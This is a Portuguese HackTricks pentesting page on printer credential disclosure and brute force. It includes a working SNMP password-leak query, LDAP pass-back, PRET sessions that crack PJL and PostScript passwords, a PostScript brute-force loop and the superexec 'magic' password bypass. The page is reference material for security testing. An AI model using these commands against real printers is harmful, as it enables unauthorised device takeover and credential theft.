hacktricks/network-services-pentesting/pentesting-printers/credentials-disclosure-brute-force.md
2024-12-12 13:56:11 +01:00

106 lines
7 KiB
Markdown

# Divulgação de Credenciais / Brute-Force
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
As impressoras são comumente implantadas com uma **senha padrão ou sem senha inicial**. Em ambos os casos, os usuários finais ou administradores devem definir ativamente uma senha para proteger o dispositivo.
## Divulgação de Senha
### SNMP
As impressoras HP antigas tinham um OID vulnerável que retornava a senha. Outros fornecedores podem ter problemas semelhantes baseados em SNMP.
```
snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 00 …
```
### Pass-Back
Se a impressora estiver **autorizando pessoas usando um LDAP externo**. Se você tiver acesso para **alterar essas configurações** (talvez usando uma interface de console web), você pode fazer a impressora se conectar ao seu servidor LDAP e autorizar qualquer usuário.\
Observe que você também pode abusar dessas configurações para **roubar as credenciais que a impressora está usando** para se conectar ao servidor LDAP. [Leia aqui para saber mais](../../windows-hardening/active-directory-methodology/ad-information-in-printers.md).
## Brute-Force
### PJL
As senhas PJL são vulneráveis a ataques de força bruta devido ao seu tamanho de chave limitado de 16 bits. Hoje em dia, em menos de 30 minutos, você pode adivinhar a senha correta.
Você pode usar os comandos `lock` e `unlock` do [PRET](https://github.com/RUB-NDS/PRET) para testar a força bruta:
```
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
PIN protection: ENABLED
Panel lock: ON
Disk lock: ON
printer:/> unlock
No PIN given, cracking.
PIN protection: DISABLED
Panel lock: OFF
Disk lock: OFF
```
### PostScript
O PostScript oferece dois tipos de senhas: a `SystemParamsPassword` é usada para alterar as configurações de trabalho de impressão, como o tamanho do papel, enquanto a `StartJobPassword` é necessária para sair do loop do servidor e, portanto, alterar permanentemente o ambiente PostScript.
Ataques de força bruta contra senhas PostScript podem ser realizados extremamente rápido porque o **interpretador PostScript pode ser programado para literalmente quebrar a si mesmo**:
```
/min 0 def /max 1000000 def
statusdict begin {
min 1 max
{dup checkpassword {== flush stop} {pop} ifelse} for
} stopped pop
```
Outra abordagem é **burlar senhas PostScript** redefinindo-as com o operador proprietário `superexec` da Adobe. Esse operador reside no dicionário internaldict, que é "protegido" por uma senha estática e mágica (`1183615869`). Envolver o código PostScript em superexec permite que um invasor ignore vários mecanismos de proteção da linguagem, que normalmente gerariam um erro de acesso inválido. Isso pode ser usado para definir senhas PostScript sem inicialmente enviar a senha atual, como mostrado abaixo:
```
{ << /SystemParamsPassword (0)
/StartJobPassword (0) >> setsystemparams
} 1183615869 internaldict /superexec get exec
```
Os comandos de bloqueio e desbloqueio do [PRET](https://github.com/RUB-NDS/PRET) podem ser usados para testar ataques de **força bruta** contra senhas PostScript numéricas (inteiras) ou para **burlá-las** com a **magia superexec**:
```
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> lock 999
printer:/> unlock
No password given, cracking.
Device unlocked with password: 999
printer:/> lock S0me_Re4lly_g00d_Passw0rd!
printer:/> unlock bypass
Resetting password to zero with super-secret PostScript magic
Device unlocked with password: 0
```
**Mais informações sobre Divulgação de Senhas e Brute-Force em** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>